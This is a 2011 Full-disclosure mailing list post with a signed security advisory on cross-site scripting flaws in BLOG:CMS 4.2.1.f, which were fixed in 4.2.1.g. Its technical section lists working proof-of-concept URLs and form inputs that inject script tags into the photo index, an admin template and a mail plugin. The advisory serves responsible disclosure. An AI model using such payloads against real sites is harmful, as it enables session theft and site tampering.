[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Multiple Cross-Site Scripting vulnerabilities in BLOG:CMS
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Multiple Cross-Site Scripting vulnerabilities in BLOG:CMS
- From: "sschurtz@xxxxxxxxxxx" <sschurtz@xxxxxxxxxxx>
- Date: Tue, 07 Jun 2011 17:39:00 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Advisory: Multiple Cross-Site Scripting vulnerabilities in
BLOG:CMS
Advisory ID: SSCHADV2011-007
Author: Stefan Schurtz
Affected Software: Successfully tested on: version 4.2.1.f
Vendor URL: http://www.blogcms.com
Vendor Status: resolved
CVE-ID: -
==========================
Vulnerability Description:
==========================
This is a Cross-Site Scripting vulnerability
==================
Technical Details:
==================
Firefox 3.6.17
http://www.example.com/blogcms/photo/index.php?"<script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/index.php?"<script>alert('XSS');</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert('XSS');</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="<script>alert(0x0029A)</script>
http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
- From [email]: <script>alert('XSS');</script>
To [email]: <script>alert('XSS');</script>
To [name]: <script>alert('XSS');</script>
Firefox 4.0.1 / IE8
http://www.example.com/blogcms/photo/index.php?"</script><script>alert('XSS');</script>
http://www.example.com/blogcms/photo/index.php?"</script><script>alert(0x0029A)</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="</script><script>alert('XSS');</script>
http://www.example.com/blogcms/photo/templates/admin_default/confirm.tpl.php?nsextt="</script><script>alert(0x0029A)</script>
http://www.example.com/blogcms/admin/plugins/mailtoafriend/mailfriend.php
- From [email]: </script><script>alert('XSS');</script>
To [email]: </script><script>alert('XSS');</script>
To [name]: </script><script>alert('XSS');</script>
=========
Solution:
=========
Update to the latest version 4.2.1.g
====================
Disclosure Timeline:
====================
03-Jun-2011 - informed developers
03-Jun-2011 - release date of this security advisory
06-Jun-2011 - new version 4.2.1.g released
07-Jun-2011 - post on BugTraq and Full-disclosure
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz.
===========
References:
===========
http://www.blogcms.com
http://www.rul3z.de/advisories/SSCHADV2011-007.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk3uRhMACgkQg3svV2LcbMB8awCghtbKIdt4GWPSVzg0w5AvJmii
gKYAoIddsy4hDndmrsjfDt450LbcBbYB
=4g1X
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/